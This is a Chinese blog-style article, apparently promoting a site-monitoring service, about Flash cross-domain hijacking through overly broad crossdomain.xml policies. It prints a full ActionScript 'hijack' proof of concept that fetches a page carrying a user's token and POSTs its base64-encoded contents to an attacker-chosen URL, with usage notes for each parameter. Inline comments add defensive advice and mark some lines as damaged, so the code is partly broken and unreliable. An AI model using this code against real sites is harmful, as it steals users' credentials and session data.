通过什么样的办法检测flash是否被劫持?
iis7网站监控
网站的劫持、污染、flash劫持可检测。
Flash 劫持
当我们在挖src漏洞的时候,如果找到一个接口或者页面的response内容中存在用户的token或者用户唯一标识信息,就要访问www..com/crossdomain.xml查看其跨域策略:
<!-- Policy file served at /crossdomain.xml on the site being examined (per the article).
     Each allow-access-from entry lets Flash content hosted on the named domain read
     responses from this site.
     NOTE(review): the domain values begin with "."; a leading "*" wildcard was presumably
     lost when the page was extracted. Confirm against the original policy.
     Defensive reading: list only the specific hosts that need access, and keep any host
     that serves user-uploaded files out of this list. -->
<cross-domain-policy>
<allow-access-from domain=".qq.com"/>
<allow-access-from domain=".gtimg.com"/>
</cross-domain-policy>
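存在以上的情况时,只要在.com下找到一个可以上传图片的地方,就可以进行劫持用户权限。这是因为该策略信任了所列的域,托管在这些域下的Flash文件都能读取带有用户身份信息的响应;防御上应把allow-access-from收紧到确实需要的具体主机,并把用户上传的文件放到不在该名单内的独立域名。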
hijack源码:
// Listing from the article: an ActionScript 3 proof of concept for the crossdomain.xml
// weakness described in the surrounding text.
// What the code does: it takes three URLs from the SWF's load parameters (jpg, get, post),
// requests the first two, and sends the base64-encoded body of the `get` response to the
// `post` URL.
// Defender's view: per the article, the read of `get` depends on the responding site's
// crossdomain.xml trusting the domain that serves this SWF. The controls that matter are
// therefore that policy file and where user uploads are hosted, not anything in this file.
package {
import flash.display.Sprite;
import flash.events.Event;
// NOTE(review): the next import is not valid ActionScript as shown; the listing appears
// to have been damaged when the page was extracted.
import flash.net.;
import flash.utils.ByteArray;
// TextField is imported but not referenced anywhere in this listing.
import flash.text.TextField;
public class hijack extends Sprite
{
// Lookup table of the 64 base64 alphabet character codes, built once when the class loads.
private static const _encodeChars:Vector.<int> = _initEncoreChar();
// Constructor: all work happens here, as soon as the SWF is instantiated.
public function hijack()
{
// Parameters supplied to the SWF by whatever loads it; all three URLs come from the loader.
var params:Object=root.loaderInfo.parameters;
// First request: a plain GET to the `jpg` URL whose response is discarded (sendToURL).
// The article's parameter notes say this is only there so the policy file is fetched early.
var jpg:URLRequest = new URLRequest(params.jpg);
jpg.method = URLRequestMethod.GET;
sendToURL(jpg);
// Second request: GET the `get` URL through a URLLoader so the response body can be read.
var request:URLRequest = new URLRequest(params.get);
request.method = URLRequestMethod.GET;
var loader:URLLoader=new URLLoader();
loader.addEventListener(Event.COMPLETE,completeHandler);
// Runs once the `get` response has fully loaded: base64-encodes the body and POSTs it
// to the `post` URL. The response to that POST is not read (sendToURL).
function completeHandler(event:Event):void{
var data:String=(loader.data);
var postURLrequest:URLRequest = new URLRequest(params.post);
postURLrequest.method = URLRequestMethod.POST;
// Only element 0 of this array is ever used; it just holds the encoded string.
var postdata:Object = new Array();
postdata[0]=encode(data);
postURLrequest.data = postdata[0];
sendToURL(postURLrequest);
}
loader.load(request);
}
// Base64-encodes a string: writes it into a ByteArray as UTF-8 bytes and delegates to
// encodeByteArray. Returns the encoded text.
public static function encode(data:String):String {
var bytes:ByteArray = new ByteArray();
bytes.writeUTFBytes(data);
return encodeByteArray(bytes);
}
// Base64-encodes the bytes of `data` and returns the result as a string.
// Full 3-byte groups become 4 output characters; a 1- or 2-byte tail is padded with "=".
public static function encodeByteArray(data:ByteArray):String {
var out:ByteArray = new ByteArray();
//Presetting the length keep the memory smaller and optimize speed since there is no "grow" needed
// NOTE(review): the expression below is not valid ActionScript as shown; the listing
// appears to have been damaged when the page was extracted.
out.length = (2 + data.length - ((data.length + 2) % 3)) 4 / 3; //Preset length //1.6 to 1.5 ms
var i:int = 0;
// r = number of leftover bytes after the last full 3-byte group; len = bytes in full groups.
var r:int = data.length % 3;
var len:int = data.length - r;
var c:uint; //read (3) character AND write (4) characters
var outPos:int = 0;
while(i < len) {
//Read 3 Characters (8bit * 3 = 24 bits)
c = data[int(i++)] << 16 | data[int(i++)] << 8 | data[int(i++)];
// Split the 24 bits into four 6-bit indexes into the alphabet table.
out[int(outPos++)] = _encodeChars[int(c >>> 18)];
out[int(outPos++)] = _encodeChars[int(c >>> 12 & 0x3f)];
out[int(outPos++)] = _encodeChars[int(c >>> 6 & 0x3f)];
out[int(outPos++)] = _encodeChars[int(c & 0x3f)];
}
//Need two "=" padding
if(r == 1) {
//Read one char, write two chars, write padding
c = data[int(i)];
out[int(outPos++)] = _encodeChars[int(c >>> 2)];
out[int(outPos++)] = _encodeChars[int((c & 0x03) << 4)];
// 61 is the character code of "=".
out[int(outPos++)] = 61;
out[int(outPos++)] = 61;
}
//Need one "=" padding
else if(r == 2) {
// Read two bytes (16 bits), write three characters, then one "=".
c = data[int(i++)] << 8 | data[int(i)];
out[int(outPos++)] = _encodeChars[int(c >>> 10)];
out[int(outPos++)] = _encodeChars[int(c >>> 4 & 0x3f)];
out[int(outPos++)] = _encodeChars[int((c & 0x0f) << 2)];
out[int(outPos++)] = 61;
}
return out.readUTFBytes(out.length);
}
// Builds the fixed-length, 64-entry table of character codes for the base64 alphabet
// (A-Z, a-z, 0-9, "+", "/") used by encodeByteArray.
private static function _initEncoreChar():Vector.<int> {
var encodeChars:Vector.<int> = new Vector.<int>(64, true);
// We could push the number directly
// but I think it's nice to see the characters (with no overhead on encode/decode)
var chars:String = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
for(var i:int = 0; i<64; i++) {
encodeChars[i] = chars.charCodeAt(i);
}
return encodeChars;
}
}
}
参数说明:
jpg:域下的图片(为了优先加载crossdomain.xml,否则劫持的接口加载太慢会导致无法劫持)
get:劫持的接口或者页面
post:接收劫持过来的页面为base64传输